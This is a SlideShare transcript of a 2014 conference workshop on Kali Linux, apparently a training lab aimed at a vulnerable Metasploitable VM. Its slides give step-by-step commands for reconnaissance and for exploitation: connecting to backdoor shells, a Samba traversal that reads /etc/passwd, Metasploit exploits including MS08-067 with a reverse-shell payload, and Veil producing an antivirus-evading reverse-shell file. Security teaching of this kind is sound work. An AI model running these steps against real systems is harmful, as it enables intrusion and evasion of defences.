SlideShare uma empresa Scribd logo

Kali Linux - Falconer

Transferir como PPTX, PDF
T
Tony Godfrey

This is a presentation I gave at the Spring 2014 Ohio HTCIA Conference held at Salt Fork Lodge.

Tecnologia
1 de 93
Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge
Welcome – Salt Fork 2014
Welcome Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.
Who or What is ‘Kali’?
Who is Kali? Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli
Hindu Kali
What is Kali Linux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
What’s on the DVD? /books ◦Official Kali Guide ◦eForensics /media ◦7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager /metaspolitable /PPT
http://www.kali.org/
Legend  We‟re going to type something  We‟re going to make a note  Might be a question?  We‟re going to click on something  Recon  Attack
Ready?
Use your powers for good
Getting Ready… - Let‟s make a folder called  kali_2014 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let‟s make sure the virtual environments are working and can „ping‟ each other
VMware Player Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.
Logins / Passwords Kali Login  root Kali Password  password Metaspolitable Login  msfadmin Metaspolitable Password  msfadmin
Metaspolitable V/E  Login  msfadmin  Password  msfadmin  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
Metaspolitable V/E Virtual Environment #1 ◦Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx
Kali V/E  Login  root  Password  password  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
Kali V/E Go to: Applications  System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply]
Kali Updating From the command line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation.
Are we good?
There are several categories Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications Password Attacks Wireless Attacks Exploitation Tools Sniffing/Spoofing Maintaining Access Reverse Engineering Stress Testing Hardware Hacking Forensics Reporting Tools System Services
Metapackages also exist
Command Line Tools Presentation on Kali Linux
ping  ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back?
top  top Tells us what services are running, processes, memory allocation Basically, a live system monitor
df  df Tells us how much space is available or „disk free‟
du  du Tells us how much space is taken or „disk used‟. You can get a shorter report by…  „du –s‟ … (disk used –summary)
free  free How much „free‟ memory is available
ls  ls This is for „list‟  ls –l (list –long)  ls -la (list – long – all attributes)
pwd  pwd Directory structure Means „path to working directory‟ or „print working directory‟
ps / ps aux / pstree  ps Means „Process Status‟ ◦aux – auxiliary view ◦pstree – shows parent/child relationships ◦Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID)
Both Environments Presentation on Kali Linux
Can you ‘ping’ each other? Virtual Environment #1 (Metaspolitable) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down… Virtual Environment #2 (Kali) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down…
CLI & Services Presentation on Kali Linux
traceroute  traceroute Essentially, „tracert‟ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
nmap  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
nmap  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – „sS‟ is stealth scan, „Pn‟ not to run a ping scan, and „A‟ is O/S detection, services, service pack.
rlogin (from Metaspolitable)  rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
rpcinfo  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.
showmount  showmount –e <Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.
telnet  telnet <Target IP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit Port 20/21 is FTP
telnet  telnet <Target IP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server
telnet  telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.
telnet  telnet <Target IP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
Are we good?
smbclient  smbclient –L <//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp
smbclient  exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit
smbclient  smbclient //<Target IP>/tmp Do you get the 'smb: >' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts?
tcpdump On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com
netdiscover On Kali netdiscover –i eth0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.
nikto On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
sqlmap On Kali sqlmap –u http://<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Wasp Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.
Web Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application
whatweb From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
From Kali - msfconsole Presentation on Kali Linux
msfconsole From Kali  service postgresql start  service metasploit start  msfconsole Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools
msfconsole From [msf>] console  help search  show exploits  search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
msfconsole From [msf>] console  search Microsoft  search diablo  search irc  search http Let’s try a few more to see what they do….
msfconsole From [msf>] console, search for „unreal‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
msfconsole From [msf>] console (ex: unreal)  set RHOST <IP Address>  show options  exploit 
msfconsole From [msf>] console, search for „twiki‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
msfconsole From [msf>] console (ex: „twiki‟)  set RHOST <IP Address>  show options  exploit 
msfconsole From [msf>] console, (target: Win XP)  use exploit/windows/smb/ms08_067_netapi  show options  show targets  set target 2
msfconsole From [msf>] console, (target: Win XP)  show options  show advanced  show targets  show payloads
msfconsole From [msf>] console, (target: Win XP)  set payload windows/shell_reverse_tcp  show options  set LHOST <Kali IP Address>  set RHOST <Target IP Address>
msfconsole From [msf>] console, (target: Win XP)  show options  exploit  Any errors? 
From Kali – more GUI Presentation on Kali Linux
Zenmap Let‟s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap
SHODAN Let‟s run SHODAN  Open a browser  www.shodanhq.com  type in „almost anything‟  …Be very nervous…
FERN Let‟s run FERN  Kali Linux  Wireless Attacks  Wireless Tools  fern-wifi-cracker
recon-ng Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng. recon-ng automated info gathering and network reconnaissance.
recon-ng Let‟s run recon-ng…  cd /opt/recon-ng  /usr/bin/python recon-ng  show modules  recon/hosts/gather/http/web/google_site
recon-ng Let‟s run recon-ng…  set DOMAIN <domain.com>  run (…let this run awhile…)  back (…previous level…)  show modules
recon-ng Let‟s run recon-ng…  use reporting/csv  run  Will add your new information to /usr/share/recon-ng/workspaces/default
dmitry If you want something more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP‟s
veil Kali has many built-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.
veil Let‟s run veil  veil-evasion  list (available payloads list)  use 13 (powershell/VirtualAlloc)  generate
veil Let‟s run veil  1 (msfvenom)  [ENTER] (accept default)  Value for LHOST (Target IP)  Value for LPORT (ex: 4000)
veil Let‟s run veil  Output name (“Squatch”)  It will store this new batch file to the  /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
Final Thoughts…
Kali Information See „Notes‟ section in this slide
Kali Comparisons See „Notes‟ section in this slide
Kali-specific Websites See „Notes‟ section in this slide
Kali Publications See „Notes‟ section in this slide
Questions/Concerns
But wait, that’s not all
Kali in a box? Do you want to run Kali on tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/
Pentesting with Firefox? The Firefox web browser is great tool to test vulnerabilities of a website. There is a portable version on PortableApps. I would suggest this version and install the needed plugins. Then, fire up the browser and „use your powers for good‟.
Thank You
Thank you Thank you for your time. Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859

Recomendados

(03 2013) guide to kali linux
(03 2013) guide to kali linux(03 2013) guide to kali linux
(03 2013) guide to kali linuxjulius77
 
Tools kali
Tools kaliTools kali
Tools kaliketban0702
 
Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoWeb Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoGene Gotimer
 
Kali presentation
Kali presentationKali presentation
Kali presentationZain Ul abadin
 
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014TGodfrey
 
2016 TTL Security Gap Analysis with Kali Linux
2016 TTL Security Gap Analysis with Kali Linux2016 TTL Security Gap Analysis with Kali Linux
2016 TTL Security Gap Analysis with Kali LinuxJason Murray
 
kali linux.pptx
kali linux.pptxkali linux.pptx
kali linux.pptxanumeha bhatnagar
 
Linux/Unix Night - (PEN) Testing Toolkits (English)
Linux/Unix Night - (PEN) Testing Toolkits (English)Linux/Unix Night - (PEN) Testing Toolkits (English)
Linux/Unix Night - (PEN) Testing Toolkits (English)Jelmer de Reus
 

Recomendados

(03 2013) guide to kali linux
(03 2013) guide to kali linux(03 2013) guide to kali linux
(03 2013) guide to kali linuxjulius77
 
Tools kali
Tools kaliTools kali
Tools kaliketban0702
 
Web Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoWeb Application Security Testing: Kali Linux Is the Way to Go
Web Application Security Testing: Kali Linux Is the Way to GoGene Gotimer
 
Kali presentation
Kali presentationKali presentation
Kali presentationZain Ul abadin
 
Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014Kali Linux - Falconer - ISS 2014
Kali Linux - Falconer - ISS 2014TGodfrey
 
2016 TTL Security Gap Analysis with Kali Linux
2016 TTL Security Gap Analysis with Kali Linux2016 TTL Security Gap Analysis with Kali Linux
2016 TTL Security Gap Analysis with Kali LinuxJason Murray
 
kali linux.pptx
kali linux.pptxkali linux.pptx
kali linux.pptxanumeha bhatnagar
 
Linux/Unix Night - (PEN) Testing Toolkits (English)
Linux/Unix Night - (PEN) Testing Toolkits (English)Linux/Unix Night - (PEN) Testing Toolkits (English)
Linux/Unix Night - (PEN) Testing Toolkits (English)Jelmer de Reus
 
Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015TGodfrey
 
Kali Linux
Kali LinuxKali Linux
Kali LinuxChanchal Dabriya
 
Kali linux summarised
Kali linux summarisedKali linux summarised
Kali linux summarisedSanchit Srivastava
 
Kali linux
Kali linuxKali linux
Kali linuxHarsh Gor
 
Shamsa altayer 10bg kali linux
Shamsa altayer 10bg kali linuxShamsa altayer 10bg kali linux
Shamsa altayer 10bg kali linuxshamsaot
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXDeborah Akuoko
 
Kali Linux
Kali LinuxKali Linux
Kali LinuxSumit Singh
 
penetration test using Kali linux ppt
penetration test using Kali linux pptpenetration test using Kali linux ppt
penetration test using Kali linux pptAbhayNaik8
 
Hack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration TestingHack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration TestingSteve Phillips
 
Kali linux and some features [view in Full screen mode]
Kali linux and some features [view in Full screen mode]Kali linux and some features [view in Full screen mode]
Kali linux and some features [view in Full screen mode]abdou Bahassou
 
Kali linux
Kali linuxKali linux
Kali linuxfutaimbinlahej
 
Kali linux
Kali linuxKali linux
Kali linuxAadhithyanPandian
 
kali linux
kali linux kali linux
kali linux Avinash Hanwate
 
kali linux Presentaion
kali linux Presentaion kali linux Presentaion
kali linux PresentaionDev Gandhi
 
Kali linux os
Kali linux osKali linux os
Kali linux osSamantha Lawrence
 
kali linux
kali linuxkali linux
kali linuxDarshan Dalwadi
 
Kali linux
Kali linuxKali linux
Kali linuxabdulla78
 
Kali tools list with short description
Kali tools list with short descriptionKali tools list with short description
Kali tools list with short descriptionJose Moruno Cadima
 
Kali linux tutorial
Kali linux tutorialKali linux tutorial
Kali linux tutorialHarikaReddy115
 
Hack wifi password using kali linux
Hack wifi password using kali linuxHack wifi password using kali linux
Hack wifi password using kali linuxHelder Oliveira
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMwareRonan Dunne, CEH, SSCP
 
Schizophrenia 4
Schizophrenia 4Schizophrenia 4
Schizophrenia 4asmith133333
 

Mais conteúdo relacionado

Mais procurados

Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015TGodfrey
 
Shamsa altayer 10bg kali linux
Shamsa altayer 10bg kali linuxShamsa altayer 10bg kali linux
Shamsa altayer 10bg kali linuxshamsaot
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXDeborah Akuoko
 
penetration test using Kali linux ppt
penetration test using Kali linux pptpenetration test using Kali linux ppt
penetration test using Kali linux pptAbhayNaik8
 
Hack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration TestingHack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration TestingSteve Phillips
 
Kali linux and some features [view in Full screen mode]
Kali linux and some features [view in Full screen mode]Kali linux and some features [view in Full screen mode]
Kali linux and some features [view in Full screen mode]abdou Bahassou
 
kali linux Presentaion
kali linux Presentaion kali linux Presentaion
kali linux PresentaionDev Gandhi
 
Kali tools list with short description
Kali tools list with short descriptionKali tools list with short description
Kali tools list with short descriptionJose Moruno Cadima
 

Mais procurados (19)

Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015Kali Linux - CleveSec 2015
Kali Linux - CleveSec 2015
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Kali linux summarised
Kali linux summarisedKali linux summarised
Kali linux summarised
 
Kali linux
Kali linuxKali linux
Kali linux
 
Shamsa altayer 10bg kali linux
Shamsa altayer 10bg kali linuxShamsa altayer 10bg kali linux
Shamsa altayer 10bg kali linux
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUX
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
penetration test using Kali linux ppt
penetration test using Kali linux pptpenetration test using Kali linux ppt
penetration test using Kali linux ppt
 
Hack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration TestingHack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration Testing
 
Kali linux and some features [view in Full screen mode]
Kali linux and some features [view in Full screen mode]Kali linux and some features [view in Full screen mode]
Kali linux and some features [view in Full screen mode]
 
Kali linux
Kali linuxKali linux
Kali linux
 
Kali linux
Kali linuxKali linux
Kali linux
 
kali linux
kali linux kali linux
kali linux
 
kali linux Presentaion
kali linux Presentaion kali linux Presentaion
kali linux Presentaion
 
Kali linux os
Kali linux osKali linux os
Kali linux os
 
kali linux
kali linuxkali linux
kali linux
 
Kali linux
Kali linuxKali linux
Kali linux
 
Kali tools list with short description
Kali tools list with short descriptionKali tools list with short description
Kali tools list with short description
 
Kali linux tutorial
Kali linux tutorialKali linux tutorial
Kali linux tutorial
 

Destaque

Hack wifi password using kali linux
Hack wifi password using kali linuxHack wifi password using kali linux
Hack wifi password using kali linuxHelder Oliveira
 
Receitas e sabores dos territórios rurais
Receitas e sabores dos territórios ruraisReceitas e sabores dos territórios rurais
Receitas e sabores dos territórios ruraisAntonio Ribeiro
 
Презентация достижений
Презентация достиженийПрезентация достижений
Презентация достиженийMikhail Galeichenko
 
ASCENCER SIN BAJAR...
ASCENCER SIN BAJAR...ASCENCER SIN BAJAR...
ASCENCER SIN BAJAR...stiven7q
 
Tercer i quart d'ESO. Problemes a l'esprint
Tercer i quart d'ESO. Problemes a l'esprintTercer i quart d'ESO. Problemes a l'esprint
Tercer i quart d'ESO. Problemes a l'esprintinfoescolapiesfigueres
 
Sarina Homes. Our Values: the #culturecode
Sarina Homes. Our Values: the #culturecodeSarina Homes. Our Values: the #culturecode
Sarina Homes. Our Values: the #culturecodekamcampb
 
Suomen nousu alkaa Oulusta - terveisiä Broadcomin ja Microsoftin irtisanomille
Suomen nousu alkaa Oulusta - terveisiä Broadcomin ja Microsoftin irtisanomilleSuomen nousu alkaa Oulusta - terveisiä Broadcomin ja Microsoftin irtisanomille
Suomen nousu alkaa Oulusta - terveisiä Broadcomin ja Microsoftin irtisanomillePrepsikka Oy
 
Segon de Primària. Sortida al Museu de l'Empordà.
Segon de Primària. Sortida al Museu de l'Empordà.Segon de Primària. Sortida al Museu de l'Empordà.
Segon de Primària. Sortida al Museu de l'Empordà.infoescolapiesfigueres
 
Работа в КУРСКХЕЛП
Работа в КУРСКХЕЛПРабота в КУРСКХЕЛП
Работа в КУРСКХЕЛПMikhail Galeichenko
 

Destaque (15)

Hack wifi password using kali linux
Hack wifi password using kali linuxHack wifi password using kali linux
Hack wifi password using kali linux
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
 
Schizophrenia 4
Schizophrenia 4Schizophrenia 4
Schizophrenia 4
 
Receitas e sabores dos territórios rurais
Receitas e sabores dos territórios ruraisReceitas e sabores dos territórios rurais
Receitas e sabores dos territórios rurais
 
Propiedades del color
Propiedades del colorPropiedades del color
Propiedades del color
 
Презентация достижений
Презентация достиженийПрезентация достижений
Презентация достижений
 
ASCENCER SIN BAJAR...
ASCENCER SIN BAJAR...ASCENCER SIN BAJAR...
ASCENCER SIN BAJAR...
 
Tercer i quart d'ESO. Problemes a l'esprint
Tercer i quart d'ESO. Problemes a l'esprintTercer i quart d'ESO. Problemes a l'esprint
Tercer i quart d'ESO. Problemes a l'esprint
 
Catalogo
CatalogoCatalogo
Catalogo
 
Sarina Homes. Our Values: the #culturecode
Sarina Homes. Our Values: the #culturecodeSarina Homes. Our Values: the #culturecode
Sarina Homes. Our Values: the #culturecode
 
Suomen nousu alkaa Oulusta - terveisiä Broadcomin ja Microsoftin irtisanomille
Suomen nousu alkaa Oulusta - terveisiä Broadcomin ja Microsoftin irtisanomilleSuomen nousu alkaa Oulusta - terveisiä Broadcomin ja Microsoftin irtisanomille
Suomen nousu alkaa Oulusta - terveisiä Broadcomin ja Microsoftin irtisanomille
 
Segon de Primària. Sortida al Museu de l'Empordà.
Segon de Primària. Sortida al Museu de l'Empordà.Segon de Primària. Sortida al Museu de l'Empordà.
Segon de Primària. Sortida al Museu de l'Empordà.
 
Capitulo4
Capitulo4Capitulo4
Capitulo4
 
聖学院Net戦略2008年
聖学院Net戦略2008年聖学院Net戦略2008年
聖学院Net戦略2008年
 
Работа в КУРСКХЕЛП
Работа в КУРСКХЕЛПРабота в КУРСКХЕЛП
Работа в КУРСКХЕЛП
 

Semelhante a Kali Linux - Falconer

RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Chapter 7 security tools i
Chapter 7 security tools iChapter 7 security tools i
Chapter 7 security tools iSyaiful Ahdan
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
Cloud party 2014 - Deploy your infrastructure with Saltstack - Salt Cloud wit...
Cloud party 2014 - Deploy your infrastructure with Saltstack - Salt Cloud wit...Cloud party 2014 - Deploy your infrastructure with Saltstack - Salt Cloud wit...
Cloud party 2014 - Deploy your infrastructure with Saltstack - Salt Cloud wit...Corley S.r.l.
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligencePriyanka Aash
 
Zaccone Carmelo - IPv6 and security from a user’s point of view
Zaccone Carmelo - IPv6 and security from a user’s point of view Zaccone Carmelo - IPv6 and security from a user’s point of view
Zaccone Carmelo - IPv6 and security from a user’s point of view IPv6 Conference
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingVlatko Kosturjak
 

Semelhante a Kali Linux - Falconer (20)

Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Windows network
Windows networkWindows network
Windows network
 
Chapter 7 security tools i
Chapter 7 security tools iChapter 7 security tools i
Chapter 7 security tools i
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
 
Windows network security
Windows network securityWindows network security
Windows network security
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
Kali kinux1
Kali kinux1Kali kinux1
Kali kinux1
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Cloud party 2014 - Deploy your infrastructure with Saltstack - Salt Cloud wit...
Cloud party 2014 - Deploy your infrastructure with Saltstack - Salt Cloud wit...Cloud party 2014 - Deploy your infrastructure with Saltstack - Salt Cloud wit...
Cloud party 2014 - Deploy your infrastructure with Saltstack - Salt Cloud wit...
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
 
Security and Linux Security
Security and Linux SecuritySecurity and Linux Security
Security and Linux Security
 
Zaccone Carmelo - IPv6 and security from a user’s point of view
Zaccone Carmelo - IPv6 and security from a user’s point of view Zaccone Carmelo - IPv6 and security from a user’s point of view
Zaccone Carmelo - IPv6 and security from a user’s point of view
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testing
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
 

Último

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
